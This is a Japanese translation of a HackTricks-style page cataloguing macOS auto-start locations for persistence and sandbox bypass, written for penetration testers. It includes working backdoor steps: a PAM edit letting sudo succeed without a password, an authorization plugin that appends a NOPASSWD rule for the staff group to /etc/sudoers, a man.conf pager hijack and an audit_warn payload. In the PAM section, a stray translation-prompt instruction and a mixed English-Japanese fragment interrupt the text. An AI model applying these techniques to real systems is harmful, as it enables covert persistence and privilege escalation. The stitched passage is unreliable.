[Array]
[String] (deny file-write* (home-subpath "/Library/Colors"))
[String] (allow file-read* process-exec file-map-executable (home-subpath "/Library/ColorPickers"))
[String] (allow file-read* (extension "com.apple.app-sandbox.read"))
Finder Sync プラグイン
Writeup: https://theevilbit.github.io/beyond/beyond_0026/
Writeup: https://objective-see.org/blog/blog_0x11.html
- サンドボックスをバイパスするのに役立つか: いいえ、自分のアプリを実行する必要があります
- TCC バイパス: ???
場所
- 特定のアプリ
説明 & エクスプロイト
Finder Sync 拡張機能を持つアプリケーションの例はこちらで見つけることができます。
アプリケーションは Finder Sync 拡張機能 を持つことができます。この拡張機能は実行されるアプリケーションの内部に入ります。さらに、拡張機能がコードを実行するためには、有効な Apple 開発者証明書で署名されている必要があります、サンドボックス化されている必要があります(ただし、緩和された例外を追加できます)そして、以下のようなもので登録されている必要があります:
pluginkit -a /Applications/FindIt.app/Contents/PlugIns/FindItSync.appex
pluginkit -e use -i com.example.InSync.InSync
スクリーンセーバー
Writeup: https://theevilbit.github.io/beyond/beyond_0016/
Writeup: https://posts.specterops.io/saving-your-access-d562bf5bf90b
場所
/System/Library/Screen Savers- Root権限が必要
- トリガー: スクリーンセーバーを選択
/Library/Screen Savers- Root権限が必要
- トリガー: スクリーンセーバーを選択
~/Library/Screen Savers- トリガー: スクリーンセーバーを選択
説明とエクスプロイト
Xcodeで新しいプロジェクトを作成し、新しいスクリーンセーバーを生成するテンプレートを選択します。次に、例えばログを生成する以下のコードを追加します。
ビルドし、.saverバンドルを**~/Library/Screen Savers**にコピーします。その後、スクリーンセーバーGUIを開き、それをクリックするだけで、多くのログが生成されるはずです:
{% code overflow="wrap" %}
sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "hello_screensaver"'
Timestamp (process)[PID]
2023-09-27 22:55:39.622369+0200 localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver void custom(int, const char **)
2023-09-27 22:55:39.622623+0200 localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver -[ScreenSaverExampleView initWithFrame:isPreview:]
2023-09-27 22:55:39.622704+0200 localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver -[ScreenSaverExampleView hasConfigureSheet]
{% endcode %}
{% hint style="danger" %}
バイナリのエンタイトルメント内にこのコードをロードする(/System/Library/Frameworks/ScreenSaver.framework/PlugIns/legacyScreenSaver.appex/Contents/MacOS/legacyScreenSaver)com.apple.security.app-sandbox が見つかるため、一般的なアプリケーションサンドボックス内にいることに注意してください。
{% endhint %}
Saverコード:
//
// ScreenSaverExampleView.m
// ScreenSaverExample
//
// Created by Carlos Polop on 27/9/23.
//
#import "ScreenSaverExampleView.h"
@implementation ScreenSaverExampleView
- (instancetype)initWithFrame:(NSRect)frame isPreview:(BOOL)isPreview
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
self = [super initWithFrame:frame isPreview:isPreview];
if (self) {
[self setAnimationTimeInterval:1/30.0];
}
return self;
}
- (void)startAnimation
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
[super startAnimation];
}
- (void)stopAnimation
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
[super stopAnimation];
}
- (void)drawRect:(NSRect)rect
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
[super drawRect:rect];
}
- (void)animateOneFrame
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
return;
}
- (BOOL)hasConfigureSheet
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
return NO;
}
- (NSWindow*)configureSheet
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
return nil;
}
__attribute__((constructor))
void custom(int argc, const char **argv) {
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
}
@end
Spotlight プラグイン
writeup: https://theevilbit.github.io/beyond/beyond_0011/
位置
~/Library/Spotlight/- トリガー: Spotlight プラグインが管理する拡張子を持つ新しいファイルが作成される。
/Library/Spotlight/- トリガー: Spotlight プラグインが管理する拡張子を持つ新しいファイルが作成される。
- Root 権限が必要
/System/Library/Spotlight/- トリガー: Spotlight プラグインが管理する拡張子を持つ新しいファイルが作成される。
- Root 権限が必要
Some.app/Contents/Library/Spotlight/- トリガー: Spotlight プラグインが管理する拡張子を持つ新しいファイルが作成される。
- 新しいアプリが必要
説明と悪用
Spotlight は macOS の組み込み検索機能で、ユーザーがコンピュータ上のデータに迅速かつ包括的にアクセスできるように設計されています。
この迅速な検索機能を実現するために、Spotlight は独自のデータベースを維持し、ほとんどのファイルを解析することでインデックスを作成し、ファイル名だけでなくその内容を通じても迅速な検索を可能にします。
Spotlight の基本的なメカニズムには、**「メタデータサーバー」**を意味する 'mds' という中央プロセスが関与しています。このプロセスは、Spotlight サービス全体を調整します。これを補完するために、さまざまなファイルタイプのインデックス作成など、さまざまなメンテナンスタスクを実行する複数の 'mdworker' デーモンがあります(ps -ef | grep mdworker)。これらのタスクは、Spotlight が多様なファイル形式の内容を理解し、インデックスを作成できるようにする Spotlight インポータープラグイン、または ".mdimporter バンドル" を通じて可能になります。
プラグインまたは .mdimporter バンドルは、前述の場所にあり、新しいバンドルが現れると、サービスを再起動する必要なく数分以内にロードされます。これらのバンドルは、どのファイルタイプと拡張子を管理できるかを示す必要があります。このようにして、Spotlight は指定された拡張子を持つ新しいファイルが作成されたときにそれらを使用します。
ロードされているすべての mdimporters を見つけることができます。実行すると:
mdimport -L
Paths: id(501) (
"/System/Library/Spotlight/iWork.mdimporter",
"/System/Library/Spotlight/iPhoto.mdimporter",
"/System/Library/Spotlight/PDF.mdimporter",
[...]
例えば、/Library/Spotlight/iBooksAuthor.mdimporter は、これらのタイプのファイル(拡張子 .iba や .book など)を解析するために使用されます:
plutil -p /Library/Spotlight/iBooksAuthor.mdimporter/Contents/Info.plist
[...]
"CFBundleDocumentTypes" => [
0 => {
"CFBundleTypeName" => "iBooks Author Book"
"CFBundleTypeRole" => "MDImporter"
"LSItemContentTypes" => [
0 => "com.apple.ibooksauthor.book"
1 => "com.apple.ibooksauthor.pkgbook"
2 => "com.apple.ibooksauthor.template"
3 => "com.apple.ibooksauthor.pkgtemplate"
]
"LSTypeIsPackage" => 0
}
]
[...]
=> {
"UTTypeConformsTo" => [
0 => "public.data"
1 => "public.composite-content"
]
"UTTypeDescription" => "iBooks Author Book"
"UTTypeIdentifier" => "com.apple.ibooksauthor.book"
"UTTypeReferenceURL" => "http://www.apple.com/ibooksauthor"
"UTTypeTagSpecification" => {
"public.filename-extension" => [
0 => "iba"
1 => "book"
]
}
}
[...]
{% hint style="danger" %}
他のmdimporterのPlistをチェックすると、**UTTypeConformsTo**のエントリーが見つからないかもしれません。それは、組み込みの_Uniform Type Identifiers_ (UTI)であり、拡張子を指定する必要がないからです。
さらに、システムのデフォルトプラグインは常に優先されるため、攻撃者はApple自身のmdimportersによってインデックスされていないファイルのみにアクセスできます。
{% endhint %}
独自のインポーターを作成するには、このプロジェクトから始めることができます: https://github.com/megrimm/pd-spotlight-importer その後、名前、CFBundleDocumentTypesを変更し、UTImportedTypeDeclarationsを追加して、サポートしたい拡張子をサポートし、schema.xmlに反映させます。
次に、処理された拡張子のファイルが作成されたときにペイロードを実行するように関数GetMetadataForFileのコードを変更します。
最後に、新しい.mdimporterをビルドしてコピーし、前述の場所のいずれかに配置すると、ログを監視するか**mdimport -L.**をチェックすることで、いつロードされるかを確認できます。
Preference Pane
{% hint style="danger" %} もう機能していないようです。 {% endhint %}
Writeup: https://theevilbit.github.io/beyond/beyond_0009/
場所
/System/Library/PreferencePanes/Library/PreferencePanes~/Library/PreferencePanes
説明
もう機能していないようです。
Root Sandbox Bypass
{% hint style="success" %} ここでは、rootであることや他の奇妙な条件が必要であるにもかかわらず、ファイルに書き込むことで何かを実行することを可能にするサンドボックスバイパスに役立つスタート位置を見つけることができます。 {% endhint %}
Periodic
Writeup: https://theevilbit.github.io/beyond/beyond_0019/
場所
/etc/periodic/daily,/etc/periodic/weekly,/etc/periodic/monthly,/usr/local/etc/periodic- Rootが必要
- トリガー: 時間が来たとき
/etc/daily.local,/etc/weekly.localまたは/etc/monthly.local- Rootが必要
- トリガー: 時間が来たとき
説明 & 悪用
周期的なスクリプト(/etc/periodic)は、/System/Library/LaunchDaemons/com.apple.periodic*に設定されたランチデーモンによって実行されます。/etc/periodic/に保存されたスクリプトはファイルの所有者として 実行されるので、潜在的な権限昇格には機能しません。
{% code overflow="wrap" %}
# Launch daemons that will execute the periodic scripts
ls -l /System/Library/LaunchDaemons/com.apple.periodic*
-rw-r--r-- 1 root wheel 887 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-daily.plist
-rw-r--r-- 1 root wheel 895 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-monthly.plist
-rw-r--r-- 1 root wheel 891 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-weekly.plist
# The scripts located in their locations
ls -lR /etc/periodic
total 0
drwxr-xr-x 11 root wheel 352 May 13 00:29 daily
drwxr-xr-x 5 root wheel 160 May 13 00:29 monthly
drwxr-xr-x 3 root wheel 96 May 13 00:29 weekly
/etc/periodic/daily:
total 72
-rwxr-xr-x 1 root wheel 1642 May 13 00:29 110.clean-tmps
-rwxr-xr-x 1 root wheel 695 May 13 00:29 130.clean-msgs
[...]
/etc/periodic/monthly:
total 24
-rwxr-xr-x 1 root wheel 888 May 13 00:29 199.rotate-fax
-rwxr-xr-x 1 root wheel 1010 May 13 00:29 200.accounting
-rwxr-xr-x 1 root wheel 606 May 13 00:29 999.local
/etc/periodic/weekly:
total 8
-rwxr-xr-x 1 root wheel 620 May 13 00:29 999.local
{% endcode %}
他にも、/etc/defaults/periodic.conf で指定された定期的に実行されるスクリプトがあります:
grep "Local scripts" /etc/defaults/periodic.conf
daily_local="/etc/daily.local" # Local scripts
weekly_local="/etc/weekly.local" # Local scripts
monthly_local="/etc/monthly.local" # Local scripts
以下のファイルのいずれか /etc/daily.local、/etc/weekly.local、/etc/monthly.local に書き込むことができれば、それは遅かれ早かれ実行されます。
{% hint style="warning" %} 定期的なスクリプトはスクリプトの所有者として実行されることに注意してください。通常のユーザーがスクリプトを所有している場合、そのユーザーとして実行されます(これにより権限昇格攻撃を防ぐことができるかもしれません)。 {% endhint %}
PAM
Writeup: Linux Hacktricks PAM
Writeup: https://theevilbit.github.io/beyond/beyond_0005/
位置
- 常にrootが必要です
説明と悪用
PAMはmacOS内での簡単な実行よりも永続性とマルウェアに焦点を当てているため、このブログでは詳細な説明は提供しません。このテクニックをよりよく理解するためには、writeupsを読んでください。
PAMモジュールを以下で確認してください:
ls -l /etc/pam.d
永続性/権限昇格テクニックでPAMを悪用する方法は、モジュール /etc/pam.d/sudo を変更し、最初に以下の行を追加することです:
auth sufficient pam_permit.so
So it will このように見える something like this:
# sudo: auth account password session
auth sufficient pam_permit.so
auth include sudo_local
auth sufficient pam_smartcard.so
auth required pam_opendirectory.so
account required pam_permit.so
password required pam_deny.so
session required pam_permit.so
以下は、macOSの自動起動場所に関するハッキング技術についてのハッキング書籍の内容です。関連する英語テキストを日本語に翻訳し、同じマークダウンおよびHTML構文を正確に保ちながら翻訳を返してください。コード、ハッキング技術名、ハッキング用語、クラウド/SaaSプラットフォーム名(Workspace、aws、gcpなど)、'leak'という単語、ペネトレーションテスト、およびマークダウンタグなどは翻訳しないでください。また、翻訳とマークダウン構文以外の余分なものは追加しないでください。
したがって、sudoを使用する試みは機能します。
{% hint style="danger" %} このディレクトリはTCCによって保護されているため、ユーザーがアクセスを求めるプロンプトが表示される可能性が高いことに注意してください。 {% endhint %}
認証プラグイン
Writeup: https://theevilbit.github.io/beyond/beyond_0028/
Writeup: https://posts.specterops.io/persistent-credential-theft-with-authorization-plugins-d17b34719d65
- サンドボックスをバイパスするのに役立ちます: 🟠
- しかし、rootである必要があり、追加の設定を行う必要があります
- TCCバイパス: ???
位置
/Library/Security/SecurityAgentPlugins/- Rootが必要です
- プラグインを使用するためには、認証データベースを設定する必要があります
説明と悪用
ユーザーがログインするときに実行される認証プラグインを作成して、永続性を維持することができます。これらのプラグインの作成方法についての詳細は、前述のWriteupを確認してください(注意してください、不適切に書かれたプラグインはあなたをロックアウトする可能性があり、リカバリーモードからmacをクリーンアップする必要があります)。
// Compile the code and create a real bundle
// gcc -bundle -framework Foundation main.m -o CustomAuth
// mkdir -p CustomAuth.bundle/Contents/MacOS
// mv CustomAuth CustomAuth.bundle/Contents/MacOS/
#import <Foundation/Foundation.h>
__attribute__((constructor)) static void run()
{
NSLog(@"%@", @"[+] Custom Authorization Plugin was loaded");
system("echo \"%staff ALL=(ALL) NOPASSWD:ALL\" >> /etc/sudoers");
}
バンドルをロードする場所に移動します:
cp -r CustomAuth.bundle /Library/Security/SecurityAgentPlugins/
最後に、このプラグインをロードするためのルールを追加します:
cat > /tmp/rule.plist <<EOF
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>class</key>
<string>evaluate-mechanisms</string>
<key>mechanisms</key>
<array>
<string>CustomAuth:login,privileged</string>
</array>
</dict>
</plist>
EOF
security authorizationdb write com.asdf.asdf < /tmp/rule.plist
evaluate-mechanisms は、認証フレームワークに対して外部メカニズムを呼び出して認証する必要があることを伝えます。さらに、privileged はそれがrootによって実行されるようにします。
以下でトリガーします:
security authorize com.asdf.asdf
そして、staff グループは sudo アクセス権を持つべきです(確認するには /etc/sudoers を読んでください)。
Man.conf
Writeup: https://theevilbit.github.io/beyond/beyond_0030/
位置
/private/etc/man.conf- Root が必要
/private/etc/man.conf: man が使用されるたびに
説明 & エクスプロイト
設定ファイル /private/etc/man.conf は、man ドキュメントファイルを開くときに使用するバイナリ/スクリプトを指定します。したがって、実行可能ファイルへのパスを変更して、ユーザーがドキュメントを読むために man を使用するたびにバックドアが実行されるようにすることができます。
例えば、/private/etc/man.conf に次のように設定します:
MANPAGER /tmp/view
その後、/tmp/view を以下のように作成します:
#!/bin/zsh
touch /tmp/manconf
/usr/bin/less -s
Apache2
Writeup: https://theevilbit.github.io/beyond/beyond_0023/
位置
/etc/apache2/httpd.conf- Rootが必要
- トリガー: Apache2が起動したとき
説明とエクスプロイト
/etc/apache2/httpd.confにモジュールをロードするよう指示する行を追加することができます:
{% code overflow="wrap" %}
LoadModule my_custom_module /Users/Shared/example.dylib "My Signature Authority"
{% endcode %}
この方法で、コンパイルされたモジュールがApacheによってロードされます。ただし、有効なApple証明書で署名するか、システムに新しい信頼できる証明書を追加して、それで署名する必要があります。
その後、必要に応じて、サーバーが起動することを確認するために次のコマンドを実行できます:
sudo launchctl load -w /System/Library/LaunchDaemons/org.apache.httpd.plist
コード例:Dylb:
#include <stdio.h>
#include <syslog.h>
__attribute__((constructor))
static void myconstructor(int argc, const char **argv)
{
printf("[+] dylib constructor called from %s\n", argv[0]);
syslog(LOG_ERR, "[+] dylib constructor called from %s\n", argv[0]);
}
BSM監査フレームワーク
Writeup: https://theevilbit.github.io/beyond/beyond_0031/
位置
/etc/security/audit_warn- Rootが必要
- トリガー: auditdが警告を検出したとき
説明とエクスプロイト
auditdが警告を検出すると、スクリプト**/etc/security/audit_warnが実行されます**。したがって、ペイロードを追加することができます。
echo "touch /tmp/auditd_warn" >> /etc/security/audit_warn
sudo audit -nを使用すると警告を強制することができます。
スタートアップアイテム
{% hint style="danger" %} これは非推奨ですので、以下のディレクトリには何も見つからないはずです。 {% endhint %}
StartupItemは、これらの2つのフォルダのいずれかに配置されるディレクトリです。/Library/StartupItems/ または /System/Library/StartupItems/
新しいディレクトリをこれら2つの場所のいずれかに配置した後、そのディレクトリ内にさらに2つのアイテムを配置する必要があります。これら2つのアイテムは、rcスクリプトといくつかの設定を保持するplistです。このplistは“StartupParameters.plist”と呼ばれなければなりません。
{% tabs %} {% tab title="StartupParameters.plist" %}
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Description</key>
<string>This is a description of this service</string>
<key>OrderPreference</key>
<string>None</string> <!--Other req services to execute before this -->
<key>Provides</key>
<array>
<string>superservicename</string> <!--Name of the services provided by this file -->
</array>
</dict>
</plist>
{% endtab %}
{% tab title="superservicename" %}
#!/bin/sh
. /etc/rc.common
StartService(){
touch /tmp/superservicestarted
}
StopService(){
rm /tmp/superservicestarted
}
RestartService(){
echo "Restarting"
}
RunService "$1"
{% endtab %} {% endtabs %}
emond
{% hint style="danger" %} macOSでこのコンポーネントを見つけることができませんでした。詳細はライトアップを確認してください。 {% endhint %}
ライトアップ: https://theevilbit.github.io/beyond/beyond_0023/
Appleはemondと呼ばれるログメカニズムを導入しました。完全に開発されたことはなく、Appleが他のメカニズムのために開発を放棄した可能性がありますが、依然として利用可能です。
このあまり知られていないサービスは、Mac管理者にとってはあまり役に立たないかもしれませんが、脅威アクターにとっては、ほとんどのmacOS管理者が探すことを知らないであろう永続性メカニズムとして使用する非常に良い理由があります。emondの悪意のある使用を検出することは難しくないはずです。なぜなら、サービスのSystem LaunchDaemonはスクリプトを実行する場所を一箇所しか見ていないからです:
ls -l /private/var/db/emondClients
XQuartz
Writeup: https://theevilbit.github.io/beyond/beyond_0018/
場所
/opt/X11/etc/X11/xinit/privileged_startx.d- Root権限が必要
- トリガー: XQuartzと共に
説明 & エクスプロイト
XQuartzはmacOSにはもうインストールされていないので、詳細はwriteupを確認してください。
kext
{% hint style="danger" %} rootとしてkextをインストールするのは非常に複雑なので、サンドボックスからの脱出や持続性のためには考慮しません(エクスプロイトを持っていない限り)。 {% endhint %}
場所
スタートアップアイテムとしてKEXTをインストールするには、以下の場所のいずれかにインストールする必要があります:
/System/Library/Extensions- OS Xオペレーティングシステムに組み込まれたKEXTファイル。
/Library/Extensions- サードパーティソフトウェアによってインストールされたKEXTファイル
現在ロードされているkextファイルをリストするには:
kextstat #List loaded kext
kextload /path/to/kext.kext #Load a new one based on path
kextload -b com.apple.driver.ExampleBundle #Load a new one based on path
kextunload /path/to/kext.kext
kextunload -b com.apple.driver.ExampleBundle
以下の情報については、カーネル拡張についてはこのセクションをチェックしてください。
amstoold
解説: https://theevilbit.github.io/beyond/beyond_0029/
場所
/usr/local/bin/amstoold- Root権限が必要
説明と悪用
どうやら/System/Library/LaunchAgents/com.apple.amstoold.plistのplistがこのバイナリを使用してXPCサービスを公開していたようですが、バイナリが存在しなかったので、何かをそこに置くと、XPCサービスが呼び出されたときにあなたのバイナリが呼び出されます。
私のmacOSではもうこれを見つけることができません。
xsanctl
解説: https://theevilbit.github.io/beyond/beyond_0015/
場所
/Library/Preferences/Xsan/.xsanrc- Root権限が必要
- トリガー: サービスが実行されたとき(まれ)
説明と悪用
どうやらこのスクリプトを実行することは非常に一般的ではなく、私のmacOSではそれを見つけることができませんでしたので、詳細が知りたい場合は解説をチェックしてください。
/etc/rc.common
{% hint style="danger" %} これは現代のMacOSバージョンでは機能しません {% endhint %}
ここにもスタートアップ時に実行されるコマンドを配置することが可能です。 通常のrc.commonスクリプトの例:
#
# Common setup for startup scripts.
#
# Copyright 1998-2002 Apple Computer, Inc.
#
######################
# Configure the shell #
######################
#
# Be strict
#
#set -e
set -u
#
# Set command search path
#
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/libexec:/System/Library/CoreServices; export PATH
#
# Set the terminal mode
#
#if [ -x /usr/bin/tset ] && [ -f /usr/share/misc/termcap ]; then
# TERM=$(tset - -Q); export TERM
#fi
###################
# Useful functions #
###################
#
# Determine if the network is up by looking for any non-loopback
# internet network interfaces.
#
CheckForNetwork()
{
local test
if [ -z "${NETWORKUP:=}" ]; then
test=$(ifconfig -a inet 2>/dev/null | sed -n -e '/127.0.0.1/d' -e '/0.0.0.0/d' -e '/inet/p' | wc -l)
if [ "${test}" -gt 0 ]; then
NETWORKUP="-YES-"
else
NETWORKUP="-NO-"
fi
fi
}
alias ConsoleMessage=echo
#
# Process management
#
GetPID ()
{
local program="$1"
local pidfile="${PIDFILE:=/var/run/${program}.pid}"
local pid=""
if [ -f "${pidfile}" ]; then
pid=$(head -1 "${pidfile}")
if ! kill -0 "${pid}" 2> /dev/null; then
echo "Bad pid file $pidfile; deleting."
pid=""
rm -f "${pidfile}"
fi
fi
if [ -n "${pid}" ]; then
echo "${pid}"
return 0
else
return 1
fi
}
#
# Generic action handler
#
RunService ()
{
case $1 in
start ) StartService ;;
stop ) StopService ;;
restart) RestartService ;;
* ) echo "$0: unknown argument: $1";;
esac
}
永続性技術とツール
AWSハッキングをゼロからヒーローまで学ぶには htARTE (HackTricks AWS Red Team Expert)をチェック!
HackTricksをサポートする他の方法:
- HackTricksにあなたの会社を広告したい、またはHackTricksをPDFでダウンロードしたい場合は、サブスクリプションプランをチェックしてください!
- 公式PEASS & HackTricksグッズを入手する
- The PEASS Familyを発見し、独占的なNFTsのコレクションをチェックする
- 💬 Discordグループに参加するか、テレグラムグループに参加する、またはTwitter 🐦 @carlospolopmをフォローする。
- HackTricksとHackTricks CloudのgithubリポジトリにPRを提出して、あなたのハッキングのコツを共有する。